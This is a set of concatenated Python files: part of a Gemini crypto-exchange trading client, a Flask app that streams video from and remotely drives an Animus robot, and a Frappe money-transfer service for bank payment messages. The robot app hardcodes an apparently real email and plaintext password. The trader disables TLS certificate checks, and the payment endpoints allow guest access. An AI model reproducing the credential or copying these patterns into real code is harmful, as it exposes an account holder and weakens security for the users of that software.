symbol = symbol.lower()
endpoint = "/v1/balances"
url = self.base_url + endpoint
payload = {
"request": endpoint,
}
headers = self._generate_request_headers(payload)
response = requests.post(url, data=None, headers=headers)
if response.status_code == 200:
for b in response.json():
if b["currency"] == symbol:
return float(b["amount"])
return 0.0
raise AssertionError(
f"HTTP ERROR {response.status_code} {response.text}"
)
async def get_order(
self, order_id: str, client_order_id: Optional[str] = None
) -> Order:
endpoint = "/v1/order/status"
url = self.base_url + endpoint
payload = {
"request": endpoint,
"order_id": order_id,
"include_trades": True,
}
headers = self._generate_request_headers(payload)
response = requests.post(url, data=None, headers=headers)
if response.status_code == 200:
order_data = response.json()
self.check_error(order_data)
return self._order_from_dict(order_data)
raise AssertionError(
f"HTTP ERROR {response.status_code} {response.text}"
)
def is_market_open_today(self) -> bool:
return True
def get_time_market_close(self) -> Optional[timedelta]:
return datetime.today().replace(
hour=23, minute=59, second=59, microsecond=0, tzinfo=utctz
) - datetime.now().replace(tzinfo=utctz)
async def reconnect(self):
await self.close()
await self.run()
@classmethod
def heartbeat(cls, flags: ThreadFlags):
tlog("GEMINI HEARTBEAT thread starting")
while flags.run:
tlog("GEMINI HEARTBEAT")
endpoint = "/v1/heartbeat"
url = cls.base_url + endpoint
payload = {
"request": endpoint,
}
headers = cls._generate_request_headers(payload)
response = requests.post(url, data=None, headers=headers)
if response.status_code != 200:
raise AssertionError(
f"HEARTHBEAT HTTP ERROR {response.status_code} {response.text}"
)
time.sleep(20)
tlog("GEMINI HEARTBEAT thread terminated")
@classmethod
def on_message(cls, ws, msgs):
msgs = json.loads(msgs)
if type(msgs) != list:
return
for msg in msgs:
if msg["type"] in [
"fill",
"cancel_rejected",
"cancelled",
"rejected",
]:
trade = cls._trade_from_dict(msg)
tlog(f"GEMINI TRADING UPDATE:{trade}")
to_send = {
"EV": "trade_update",
"symbol": trade.symbol.lower(),
"trade": trade.__dict__,
}
try:
qs = cls.get_instance().queues
if qs:
for q in qs.get_allqueues():
q.put(to_send, timeout=1)
except queue.Full as f:
tlog(
f"[EXCEPTION] process_message(): queue for {symbol} is FULL:{f}, sleeping for 2 seconds and re-trying."
)
raise
@classmethod
def on_error(cls, ws, error):
tlog(f"[ERROR] GeminiTrader {error}")
@classmethod
def on_close(cls, ws, close_status_code, close_msg):
tlog(f"on_close(): status={close_status_code}, close_msg={close_msg}")
async def run(self):
if not self.running_task:
tlog("starting Gemini listener")
endpoint = "/v1/order/events"
payload = {"request": endpoint}
headers = self._generate_ws_headers(payload)
self.ws = websocket.WebSocketApp(
f"{self.base_websocket}{endpoint}?eventTypeFilter=cancel_rejected&eventTypeFilter=cancelled&eventTypeFilter=rejected&eventTypeFilter=fill&eventTypeFilter=closed&heartbeat=true",
on_message=self.on_message,
on_error=self.on_error,
on_close=self.on_close,
header=headers,
)
self.running_task = Thread(
target=self.ws.run_forever,
args=(None, {"cert_reqs": ssl.CERT_NONE}),
)
self.flags = ThreadFlags(run=True)
self.hb_task = Thread(target=self.heartbeat, args=(self.flags,))
self.running_task.start()
self.hb_task.start()
return self.running_task
async def close(self):
if self.running_task and self.running_task.is_alive():
tlog(f"close task {self.running_task}")
self.ws.keep_running = False
self.flags.run = False
self.running_task.join()
self.hb_task.join()
tlog("task terminated")
self.ws = None
self.running_task = None
self.hb_task = None
self.flags = None
async def get_tradeable_symbols(self) -> List[str]:
endpoint = "/v1/symbols"
url = self.base_url + endpoint
response = requests.get(url)
if response.status_code == 200:
return response.json()
raise AssertionError(
f"HTTP ERROR {response.status_code} {response.text}"
)
async def get_shortable_symbols(self) -> List[str]:
return []
async def is_shortable(self, symbol) -> bool:
return False
async def cancel_order(self, order: Order) -> bool:
endpoint = "/v1/order/cancel"
url = self.base_url + endpoint
payload = {"request": endpoint, "order_id": order.order_id}
headers = self._generate_request_headers(payload)
response = requests.post(url, data=None, headers=headers)
if response.status_code == 200:
order_status = response.json()
self.check_error(order_status)
return order_status
raise AssertionError(
f"HTTP ERROR {response.status_code} {response.text}"
)
async def submit_order(
self,
symbol: str,
qty: float,
side: str,
order_type: str,
time_in_force: str = None,
limit_price: str = None,
stop_price: str = None,
client_order_id: str = None,
extended_hours: bool = None,
order_class: str = None,
take_profit: dict = None,
stop_loss: dict = None,
trail_price: str = None,
trail_percent: str = None,
on_behalf_of: str = None,
) -> Order:
symbol = symbol.lower()
if order_type == "market":
raise AssertionError(
"GEMINI does not support market orders, use limit orders"
)
if float(qty) < get_asset_min_qty(symbol):
raise AssertionError(
f"GEMINI requested quantity of {qty} is below minimum for {symbol}"
)
endpoint = "/v1/order/new"
url = self.base_url + endpoint
qty = round_asset(symbol, float(qty))
payload = {
"request": endpoint,
"symbol": symbol,
"amount": str(qty),
"price": str(limit_price)
if order_type == "limit"
else str(60000.0 * qty),
"side": side,
"type": "exchange limit",
"client_order_id": client_order_id,
"options": ["immediate-or-cancel"]
if order_type == "market"
else [],
}
headers = self._generate_request_headers(payload)
response = requests.post(url, data=None, headers=headers)
if response.status_code == 200:
new_order = response.json()
self.check_error(new_order)
return self._order_from_dict(new_order)
if self.flags:
self.flags.run = False
await self.close()
raise AssertionError(
f"HTTP ERROR {response.status_code} {response.text}"
)
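# --- Hedged illustration (not part of the original trader) ---
# A minimal sketch of the request-signing scheme implemented by
# _generate_request_headers() above: the JSON payload (carrying a nonce) is
# base64-encoded and the signature is an HMAC-SHA384 of that base64 blob keyed
# with the API secret.  _sign_payload_example and its parameters are
# hypothetical names used only for this sketch; it reuses the module-level
# base64/hashlib/hmac/json/time imports.
def _sign_payload_example(api_secret: bytes, payload: dict) -> dict:
    payload = dict(payload, nonce=str(int(time.time() * 1000)))
    b64 = base64.b64encode(json.dumps(payload).encode())
    signature = hmac.new(api_secret, b64, hashlib.sha384).hexdigest()
    return {
        "X-GEMINI-PAYLOAD": b64,
        "X-GEMINI-SIGNATURE": signature,
    }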
|
appt.py
|
from flask import Flask, render_template, Response, request, abort, jsonify
import cv2
from flask_cors import CORS
import os
import animus_client as animus
import animus_utils as utils
import sys
import logging
import numpy as np
import atexit
import time
import threading
import socketio
import simplejpeg
stopFlag = False
from dotenv import load_dotenv
load_dotenv()
sio = socketio.Client()
sio.connect('http://localhost:9000')
# if(sio.connected):
# print("*****************YES*****************")
# else:
# print("*****************NO*******************")
app = Flask(__name__)
CORS(app)
class AnimusRobot:
def __init__(self):
self.log = utils.create_logger("MyAnimusApp", logging.INFO)
self.myrobot = {}
self.videoImgSrc=''
self.getRobot()
self.openModalities()
self.utils = utils
self.prevTime = 0
self.prev_motor_dict = utils.get_motor_dict()
self.head_motion_counter = {
'head_up_down': 0, # -head_angle_threshold,head_angle_threshold
'head_left_right': 0, # -head_angle_threshold,head_angle_threshold
'head_roll': 0
}
self.head_angle_incrementer = 5
self.head_angle_threshold = 90
self.body_rotation_speed=3
self.prevNavKey='nullmotion'
# self.getVideofeed()
self.thread=threading.Thread(target=self.gen_frames)
def openModalities(self):
open_success = self.myrobot.open_modality("vision")
if not open_success:
self.log.error("Could not open robot vision modality")
# sys.exit(-1)
open_success = self.myrobot.open_modality("motor")
if not open_success:
self.log.error("Could not open robot motor modality")
# sys.exit(-1)
open_success = self.myrobot.open_modality("speech")
if not open_success:
self.log.error("Could not open robot speech modality")
# sys.exit(-1)
open_success = self.myrobot.open_modality("emotion")
if not open_success:
self.log.error("Could not open robot speech modality")
# sys.exit(-1)
def getRobot(self):
for i in range(10):
self.log.info(animus.version())
# print(animus.version())
audio_params = utils.AudioParams(
Backends=["notinternal"],
SampleRate=16000,
Channels=1,
SizeInFrames=True,
TransmitRate=30
)
setup_result = animus.setup(audio_params, "PythonAnimusBasics", True)
if not setup_result.success:
time.sleep(5)
continue
login_result = animus.login_user("ms414@hw.ac.uk", "C3):]RR[Rs$Y", False)
if login_result.success:
self.log.info("Logged in")
else:
time.sleep(5)
continue
get_robots_result = animus.get_robots(True, True, False)
# print(get_robots_result)
if not get_robots_result.localSearchError.success:
self.log.error(get_robots_result.localSearchError.description)
if not get_robots_result.remoteSearchError.success:
self.log.error(get_robots_result.remoteSearchError.description)
if len(get_robots_result.robots) == 0:
self.log.info("No Robots found")
animus.close_client_interface()
time.sleep(5)
continue
chosen_robot_details = get_robots_result.robots[0]
self.myrobot = animus.Robot(chosen_robot_details)
connected_result = self.myrobot.connect()
if not connected_result.success:
print("Could not connect with robot {}".format(self.myrobot.robot_details.robot_id))
animus.close_client_interface()
time.sleep(5)
continue
else:
break
def fixImage(self,img):
bgr = img[:,:,0:3]
# convert to HSV
hsv = cv2.cvtColor(bgr, cv2.COLOR_BGR2HSV)
h,s,v = cv2.split(hsv)
purple = 120
green = 25
diff_color = green - purple
hnew = np.mod(h + diff_color, 180).astype(np.uint8)
# snew = np.mod(s-2,180).astype(np.uint8)
hsv_new = cv2.merge([hnew,s,v])
bgr_new = cv2.cvtColor(hsv_new, cv2.COLOR_HSV2BGR)
return bgr_new
def gen_frames(self): # generate frame by frame from camera
try:
while True:
try:
image_list, err = self.myrobot.get_modality("vision", True)
except:
continue
if err.success:
# clear_img=self.fixImage(image_list[0].image)
# ret, buffer = cv2.imencode('.jpg', clear_img)
# # ret, buffer = cv2.imencode('.jpg', image_list[0].image)
# frame = buffer.tobytes()
frame=simplejpeg.encode_jpeg(image_list[0].image,colorspace='BGR')
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n') # concat frame one by one and show result
# print("frame")
time.sleep(0.001)
# frame = buffer.tobytes()
# self.videoImgSrc=b'--frame\r\n Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n'
# yield(self.videoImgSrc)
except KeyboardInterrupt:
# cv2.destroyAllWindows()
self.log.info("Closing down")
# self.myrobot.disconnect()
# animus.close_client_interface()
# sys.exit(-1)
except SystemExit:
# cv2.destroyAllWindows()
self.log.info("Closing down")
# self.myrobot.disconnect()
# animus.close_client_interface()
# sys.exit(-1)
    def closeRobot(self, user=None):
# self.myrobot.disconnect()
# animus.close_client_interface()
print(user)
cv2.destroyAllWindows()
self.log.info("Closing down")
self.myrobot.disconnect()
animus.close_client_interface()
sys.exit(-1)
Robot=AnimusRobot()
atexit.register(Robot.closeRobot, user='Reiner Braun')
@app.route('/',methods=['POST','GET'])
def index():
"""Video streaming home page."""
if(request.method=='POST'):
data=request.get_json()
# print(data)
if(data['email']==os.getenv('EMAIL') and data['password']==os.getenv('PASSWORD')):
return render_template('index.html'), 200
else:
abort(401, description="Unauthorized")
# app.route('/stop')
# return render_template('stop.html')
else:
# Robot.camera.release()
# abort(401, description="Unauthorized")
return render_template('index.html'), 200
@app.errorhandler(401)
def resource_not_found(e):
return jsonify(error=str(e)), 401
@app.route('/stop')
def stop():
Robot.closeRobot()
return render_template('stop.html')
@app.route('/start')
def start():
Robot.getRobot()
return render_template('index.html')
@app.route('/video_feed')
def video_feed():
# if(Robot.thread.is_alive()==False):
# Robot.thread.start()
#Video streaming route. Put this in the src attribute of an img tag
return Response(Robot.gen_frames(), mimetype='multipart/x-mixed-replace; boundary=frame')
@sio.event
def connect():
print('connected to server')
@sio.event
def disconnect():
print('disconnected from server')
def resetRobotHead():
# Robot.prev_motor_dict["head_up_down"]=0
# Robot.head_motion_counter['head_up_down']=0
Robot.head_motion_counter['head_left_right']=0
Robot.prev_motor_dict["head_left_right"]=0
Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# if(Robot.prev_motor_dict['head_up_down']>0):
# for i in range(abs(Robot.head_motion_counter['head_up_down'])):
# Robot.head_motion_counter['head_up_down'] = Robot.head_motion_counter['head_up_down'] - 1
# Robot.prev_motor_dict["head_up_down"] = Robot.head_motion_counter['head_up_down'] * Robot.utils.HEAD_UP
# ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# time.sleep(0.02)
# # Robot.prev_motor_dict['head_up_down']=0
# elif(Robot.prev_motor_dict['head_up_down']<0):
# for i in range(abs(Robot.head_motion_counter['head_up_down'])):
# Robot.head_motion_counter['head_up_down'] = Robot.head_motion_counter['head_up_down'] + 1
# Robot.prev_motor_dict["head_up_down"] = Robot.head_motion_counter['head_up_down'] * Robot.utils.HEAD_UP
# ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# time.sleep(0.02)
# if(Robot.prev_motor_dict['head_left_right']>0):
# for i in range(abs(Robot.head_motion_counter['head_left_right'])):
# Robot.head_motion_counter['head_left_right'] = Robot.head_motion_counter['head_left_right'] - 1
# Robot.prev_motor_dict["head_left_right"] = Robot.head_motion_counter['head_left_right'] * Robot.utils.HEAD_RIGHT
# ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# time.sleep(0.02)
# # Robot.prev_motor_dict['head_up_down']=0
# elif(Robot.prev_motor_dict['head_left_right']<0):
# for i in range(abs(Robot.head_motion_counter['head_left_right'])):
# Robot.head_motion_counter['head_left_right'] = Robot.head_motion_counter['head_left_right'] + 1
# Robot.prev_motor_dict["head_left_right"] = Robot.head_motion_counter['head_left_right'] * Robot.utils.HEAD_RIGHT
# ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# time.sleep(0.02)
@sio.on('FROMNODEAPI')
def frontenddata(data):
if not (Robot.myrobot == None):
key = str(data)
# list_of_motions=[]
# motorDict = Robot.utils.get_motor_dict()
# list_of_motions = [motorDict.copy()]
if(key == 'head_up'):
if not (Robot.head_motion_counter['head_up_down'] == Robot.head_angle_threshold):
for i in range(Robot.head_angle_incrementer):
Robot.head_motion_counter['head_up_down'] = Robot.head_motion_counter['head_up_down'] + 1
Robot.prev_motor_dict["head_up_down"] = Robot.head_motion_counter['head_up_down'] * Robot.utils.HEAD_UP
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
time.sleep(0.02)
# sio.emit("sendHeadMovement","up")
elif(key == 'head_down'):
if not (Robot.head_motion_counter['head_up_down'] == -1*Robot.head_angle_threshold):
for i in range(Robot.head_angle_incrementer):
Robot.head_motion_counter['head_up_down'] = Robot.head_motion_counter['head_up_down'] - 1
Robot.prev_motor_dict["head_up_down"] = Robot.head_motion_counter['head_up_down'] * Robot.utils.HEAD_UP
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
time.sleep(0.02)
# sio.emit("sendHeadMovement","down")
elif(key == 'head_left'):
if not (Robot.head_motion_counter['head_left_right'] == -1*Robot.head_angle_threshold):
for i in range(Robot.head_angle_incrementer):
Robot.head_motion_counter['head_left_right'] = Robot.head_motion_counter['head_left_right'] - 1
Robot.prev_motor_dict["head_left_right"] = Robot.head_motion_counter['head_left_right'] * Robot.utils.HEAD_RIGHT
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
time.sleep(0.02)
# sio.emit("sendHeadMovement","left")
elif(key == 'head_right'):
if not (Robot.head_motion_counter['head_left_right'] == Robot.head_angle_threshold):
for i in range(Robot.head_angle_incrementer):
Robot.head_motion_counter['head_left_right'] = Robot.head_motion_counter['head_left_right'] + 1
Robot.prev_motor_dict["head_left_right"] = Robot.head_motion_counter['head_left_right'] * Robot.utils.HEAD_RIGHT
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
time.sleep(0.02)
# sio.emit("sendHeadMovement","right")
elif(key == 'rotate_left'):
resetRobotHead()
Robot.prev_motor_dict["body_rotate"] = Robot.body_rotation_speed
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# sio.emit("sendHeadMovement","reset")
elif(key == 'rotate_right'):
resetRobotHead()
Robot.prev_motor_dict["body_rotate"] = -Robot.body_rotation_speed
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# sio.emit("sendHeadMovement","reset")
elif(key == 'nullmotion' and Robot.prevNavKey!='nullmotion'):
Robot.prev_motor_dict["body_forward"] = 0.0
Robot.prev_motor_dict["body_sideways"] = 0.0
Robot.prev_motor_dict["body_rotate"] = 0.0
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# sio.emit("sendHeadMovement","reset")
elif(key == 'forward'):
resetRobotHead()
Robot.prev_motor_dict["body_forward"] = 1.0
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# sio.emit("sendHeadMovement","reset")
elif(key == 'left'):
resetRobotHead()
Robot.prev_motor_dict["body_sideways"] = 1.0
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# sio.emit("sendHeadMovement","reset")
elif(key == 'back'):
resetRobotHead()
Robot.prev_motor_dict["body_forward"] = -1.0
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# sio.emit("sendHeadMovement","reset")
elif(key == 'right'):
resetRobotHead()
Robot.prev_motor_dict["body_sideways"] = -1.0
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# sio.emit("sendHeadMovement","reset")
print(key)
Robot.prevNavKey=key
time.sleep(0.002)
# ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# for motion_counter in range(len(list_of_motions)):
# ret = Robot.myrobot.set_modality("motor", list(list_of_motions[motion_counter].values()))
@sio.on('FROMNODESPEECHAPI')
def frontendspeechdata(data):
if not (Robot.myrobot == None):
speech = str(data)
print(speech)
if not(speech.lower().find("oh,")==-1):
Robot.myrobot.set_modality("emotion", "surprised")
elif(speech.lower().find("reading?")==-1):
Robot.myrobot.set_modality("emotion", "neutral")
elif(speech.lower().find("thank you for your patience")==-1):
Robot.myrobot.set_modality("emotion", "happy")
ret = Robot.myrobot.set_modality(
"speech", speech)
#pychace
# for motion_counter in range(len(list_of_motions)):
# ret = Robot.myrobot.set_modality("motor", list(list_of_motions[motion_counter].values()))
if __name__ == '__main__':
# print(os.getenv('EMAIL'))
app.run(debug=False,host=os.getenv('HOST'),port=os.getenv('PORT'))
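# --- Hedged illustration (not part of the deployed app) ---
# A standalone sketch of the multipart MJPEG pattern used by gen_frames() and
# /video_feed above: each JPEG is wrapped in a "--frame" part and the route
# responds with mimetype multipart/x-mixed-replace.  _demo_stream and its
# encode_frame parameter are hypothetical; encode_frame stands in for whatever
# produces JPEG bytes (e.g. simplejpeg.encode_jpeg on a captured image).
def _demo_stream(encode_frame):
    def _gen():
        while True:
            jpeg_bytes = encode_frame()
            yield (b'--frame\r\n'
                   b'Content-Type: image/jpeg\r\n\r\n' + jpeg_bytes + b'\r\n')
            time.sleep(0.001)
    return Response(_gen(), mimetype='multipart/x-mixed-replace; boundary=frame')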
|
YIBInfoService.py
|
from math import exp
import sys
import frappe
import threading
from frappe.database.database import enqueue_jobs_after_commit
import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
from money_transfer.money_transfer.service.utils import background, get_service_files_names
from money_transfer.money_transfer.service.xml_handler import create_push_status_xml_doc, read_push_status_xml, read_status_xml, save_xml, read_xml_verification, create_verification_res_xml, get_xml_response, read_xml_payment, create_payment_res_xml, save_xml_prtfy, create_status_res_xml
from money_transfer.money_transfer.service.db import save_status_file_db, get_payment_status_data, get_psh_status_flg, get_status_data, save_payment_file_db, update_psh_status, update_status_flg, validate_req_bank, validate_account_type, save_verification_file_db, update_timer_flg, get_payment_status_flgs, get_fees_data, update_payment_fees_data
from money_transfer.money_transfer.service.socket_handler import get_customer_details, make_payment_for_customer
from money_transfer.money_transfer.db import get_table_serial_key
from money_transfer.money_transfer.xml_handler import create_fees_xml_doc, read_xml_fees_data
from money_transfer.money_transfer.utils import get_current_site_name, console_print
import money_transfer.money_transfer.service.const as const
from frappe.utils.background_jobs import enqueue, get_queue
import time
import json
@frappe.whitelist(allow_guest=True)
def Verification():
# Get All Files Names & Paths
req_file_name, res_file_name, req_xml_path, res_xml_path, site_name, private_path, req_path, res_path = get_service_files_names('Verification', 'VerificationFileSerIn')
if frappe.request.data:
req_xml = frappe.request.data
# Save Request Xml File to Server
save_xml_prtfy(req_xml_path, req_xml)
res_xml, doc_name = validate_verification_request(req_xml)
# Save Request Xml File to Database
save_verification_file_db(site_name, req_file_name, req_xml_path, private_path, req_path, doc_name)
else:
res_xml, doc_name = create_verification_res_xml(" ", " ", const.BANK_HEADER_NAME, " ", const.FP_HEADER, " ", " ", " ", " ", " ", " ", "false", const.TECHNICAL_ERROR, " ", " ", 1)
# Save Response Xml File to Server & Database
save_xml(res_xml_path, res_xml)
save_verification_file_db(site_name, res_file_name, res_xml_path, private_path, res_path, doc_name)
# Get Response Data
response = get_xml_response(res_xml)
return response
@frappe.whitelist(allow_guest=True)
def Payment():
# Get All Files Names & Paths
req_file_name, res_file_name, req_xml_path, res_xml_path, site_name, private_path, req_path, res_path = get_service_files_names('Payment', 'PaymentFileSerIn')
if frappe.request.data:
req_xml = frappe.request.data
# Save Request Xml File to Server
save_xml_prtfy(req_xml_path, req_xml)
res_xml, req_bank_tx_id, doc_name = validate_payment_request(req_xml)
# Save Request Xml File to Database
save_payment_file_db(site_name, req_file_name, req_xml_path, private_path, req_path, doc_name)
args = {"req_bank_tx_id": req_bank_tx_id, "doc_name":doc_name}
status_timer = threading.Timer(10, on_time_event, kwargs=args)
#status_timer = threading.Thread(target=on_time_event, name="Downloader", kwargs=args)
status_timer.start()
# on_time_event(req_bank_tx_id, doc_name)
else:
res_xml, doc_name = create_payment_res_xml(const.BANK_HEADER_NAME, const.FP_HEADER, " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " "," ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ")
# Save Response Xml File to Server & Database
save_xml(res_xml_path, res_xml)
save_payment_file_db(site_name, res_file_name, res_xml_path, private_path, res_path, doc_name)
# Get Response Data
response = get_xml_response(res_xml)
return response
@frappe.whitelist(allow_guest=True)
def Status2():
# Get All Files Names & Paths
req_file_name, res_file_name, req_xml_path, res_xml_path, site_name, private_path, req_path, res_path = get_service_files_names('Status', 'StatusFileSerIn')
if frappe.request.data:
req_xml = frappe.request.data
# Save Request Xml File to Server
save_xml_prtfy(req_xml_path, req_xml)
res_xml, doc_name = validate_status_request(req_xml)
# Save Request Xml File to Database
save_status_file_db(site_name, req_file_name, req_xml_path, private_path, req_path, doc_name)
else:
res_xml, doc_name = create_status_res_xml(" ",const.BANK_HEADER_NAME, const.FP_HEADER, " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", const.TECHNICAL_ERROR, "false", " ", " ", " ", " ", " ", " ", " ", " ")
# Save Response Xml File to Server & Database
save_xml(res_xml_path, res_xml)
save_status_file_db(site_name, res_file_name, res_xml_path, private_path, res_path, doc_name)
# Get Response Data
response = get_xml_response(res_xml)
return response
def validate_verification_request(verification_xml):
fp_header, bank_header_id, bank_document_id, req_bank_id, req_bank_msg_id, biz_msg_idr, msg_def_idr, prtry_type, client_no, req_bank_cre_dt = read_xml_verification(verification_xml)
our_biz_msg_idr_serial = get_table_serial_key('VerificationSerialIn_RS')
if not validate_req_bank(req_bank_id):
verification_res, doc_name = create_verification_res_xml(client_no, "xxxxx", const.BANK_HEADER_NAME, req_bank_id, const.FP_HEADER, str(our_biz_msg_idr_serial), const.REQ_VERIFICATION_BIZ_MSG_IDR, const.RES_VERIFICATION_BIZ_MSG_IDR, biz_msg_idr, req_bank_msg_id, prtry_type, "false", const.WRONG_BIC, req_bank_cre_dt, " ", 1)
else:
if not validate_account_type(prtry_type):
verification_res, doc_name = create_verification_res_xml(client_no, "xxxxx", const.BANK_HEADER_NAME, req_bank_id, const.FP_HEADER, str(our_biz_msg_idr_serial), const.REQ_VERIFICATION_BIZ_MSG_IDR, const.RES_VERIFICATION_BIZ_MSG_IDR, biz_msg_idr, req_bank_msg_id, prtry_type, "false", const.USER_NOT_FOUND, req_bank_cre_dt, " ", 1)
else:
customer_name, customer_add, customer_no, customer_brn, region_unique_code, customer_error, error_flg = get_customer_details(client_no)
if error_flg == 1 and (customer_error == 'ca601' or customer_error == 'ca830' or customer_error == 'ca600'):
verification_res, doc_name = create_verification_res_xml(client_no, "xxxxx", const.BANK_HEADER_NAME, req_bank_id, const.FP_HEADER, str(our_biz_msg_idr_serial), const.REQ_VERIFICATION_BIZ_MSG_IDR, const.RES_VERIFICATION_BIZ_MSG_IDR, biz_msg_idr, req_bank_msg_id, prtry_type, "false", const.USER_BLOCKED, req_bank_cre_dt, customer_error, error_flg)
else:
if error_flg == 1:
verification_res, doc_name = create_verification_res_xml(client_no, "xxxxx", const.BANK_HEADER_NAME, req_bank_id, const.FP_HEADER, str(our_biz_msg_idr_serial), const.REQ_VERIFICATION_BIZ_MSG_IDR, const.RES_VERIFICATION_BIZ_MSG_IDR, biz_msg_idr, req_bank_msg_id, prtry_type, "false", const.USER_NOT_FOUND, req_bank_cre_dt, customer_error,error_flg )
else:
client_name = customer_name.strip() + '#' + customer_add.strip() + '#' + customer_brn.strip() + '#' + region_unique_code.strip()
verification_res, doc_name= create_verification_res_xml(client_no, client_name, const.BANK_HEADER_NAME, req_bank_id, const.FP_HEADER, str(our_biz_msg_idr_serial), const.REQ_VERIFICATION_BIZ_MSG_IDR, const.RES_VERIFICATION_BIZ_MSG_IDR, biz_msg_idr, req_bank_msg_id, prtry_type, "true", const.REQ_SUCCESS, req_bank_cre_dt, customer_error, error_flg)
return verification_res, doc_name
def validate_payment_request(payment_xml):
(header_from, header_to, req_bank_biz_msg_idr, req_bank_msg_def_idr, req_bank_cre_dt, req_bank_cre_dt_tm, req_bank_sttlm_mtd, req_bank_lcl_instrm,
req_bank_id, req_bank_tx_id, req_bank_intr_bk_sttlm_amt, req_bank_intr_bk_sttlm_amt_ccy, req_bank_accptnc_dt_tm, req_bank_chrg_br, req_bank_dbtr_name, req_bank_pstl_adr, req_bank_dbtr_ctct_dtls,
req_bank_debit_prt, req_bank_dbtr_acct_issr, req_bank_debit_id, req_bank_dbtr_agt_issr, req_bank_bldg_nb, req_bank_brnch_id, req_bank_cdtr_nm, req_bank_prtry_id, req_bank_acct_id, req_bank_ustrd) = read_xml_payment(payment_xml)
our_biz_msg_idr_serial = get_table_serial_key('PaymentSerialIn_RS')
payment_res, doc_name = create_payment_res_xml(header_from, header_to, req_bank_biz_msg_idr, req_bank_msg_def_idr, req_bank_cre_dt, req_bank_cre_dt_tm, req_bank_sttlm_mtd, req_bank_lcl_instrm, req_bank_id,
req_bank_tx_id, req_bank_intr_bk_sttlm_amt, req_bank_intr_bk_sttlm_amt_ccy, req_bank_accptnc_dt_tm, req_bank_chrg_br, req_bank_dbtr_name, req_bank_pstl_adr, req_bank_dbtr_ctct_dtls, req_bank_debit_prt, req_bank_dbtr_acct_issr,
req_bank_debit_id, req_bank_dbtr_agt_issr, req_bank_bldg_nb, req_bank_brnch_id, req_bank_cdtr_nm, req_bank_prtry_id, req_bank_acct_id, req_bank_ustrd, our_biz_msg_idr_serial)
return payment_res, req_bank_tx_id, doc_name
def on_time_event(req_bank_tx_id, doc_name):
frappe.init(site=get_current_site_name())
frappe.connect()
frappe.clear_cache()
timer_exceed_flg, status_received_flg, res_tx_sts = get_payment_status_flgs(doc_name)
if status_received_flg == 1 or timer_exceed_flg >= 1 or res_tx_sts != 'ACSC':
frappe.db.commit()
frappe.clear_cache()
frappe.db.close()
frappe.destroy()
return
update_timer_flg(doc_name, 1)
push_status_loop(req_bank_tx_id, doc_name)
frappe.db.commit()
frappe.clear_cache()
frappe.db.close()
frappe.destroy()
def push_status_loop(req_bank_tx_id, doc_name):
for counter in range(5):
psh_sts_flg = get_psh_status_flg(req_bank_tx_id)
if int(psh_sts_flg) == 99:
push_status(req_bank_tx_id, doc_name)
else:
break
def push_status(req_bank_tx_id, doc_name):
res_bank_id, res_bank_biz_msg, req_bank_biz_msg, req_bank_acct_id = get_payment_status_data(doc_name)
status_req_xml = create_push_status_xml_doc(req_bank_biz_msg, res_bank_id, res_bank_biz_msg, req_bank_tx_id)
req_file_name, res_file_name, req_xml_path, res_xml_path, site_name, private_path, req_path, res_path = get_service_files_names('PushStatus', 'StatusFileSerIn')
save_xml(req_xml_path, status_req_xml)
save_payment_file_db(site_name, req_file_name, req_xml_path, private_path, req_path, doc_name)
push_status_url = frappe.db.get_value("Bank Service Control", "253", ["rec_text"])
try:
headers = {'Content-Type': 'application/xml'}
res_xml = requests.post(url= push_status_url, data=status_req_xml.encode('utf-8'), headers=headers, timeout=15).text
save_xml_prtfy(res_xml_path, res_xml)
save_payment_file_db(site_name, res_file_name, res_xml_path, private_path, res_path, doc_name)
validate_push_status_res(res_xml, doc_name, req_bank_acct_id, req_bank_tx_id)
except requests.Timeout:
try:
update_psh_status(doc_name, '99', 'pushstatus time out')
except:
update_psh_status(doc_name, '99', '')
except:
try:
update_psh_status(doc_name, '99', sys.exc_info()[0])
except:
update_psh_status(doc_name, '99', '')
def validate_push_status_res(status_res_xml, doc_name, rv_req_bank_acct_id, req_bank_tx_id):
(header_from, header_to, req_bank_biz_msg_idr, req_bank_msg_def_idr, req_bank_cre_dt, res_bank_biz_msg_idr, res_bank_msg_def_idr, res_bank_cre_dt,
req_bank_cre_dt_tm, req_bank_msg_id, req_bank_id, res_orgnl_msg_id, res_orgnl_msg_nm_id, res_orgnl_cre_dt_tm, req_orgnl_tx_id, req_tx_sts,
req_intr_bk_sttl_amt, req_nm, req_adr_line, req_bank_client_id, req_bank_prtry_id) = read_push_status_xml(status_res_xml)
if rv_req_bank_acct_id == req_bank_client_id and req_bank_tx_id == req_orgnl_tx_id:
if req_tx_sts == 'ACSC':
customer_no, customer_error, error_flg = req_bank_client_id, '', 0
snd_fee, swf_fee, rcv_fee = "0", get_transfer_fee(req_orgnl_tx_id, doc_name),"0"
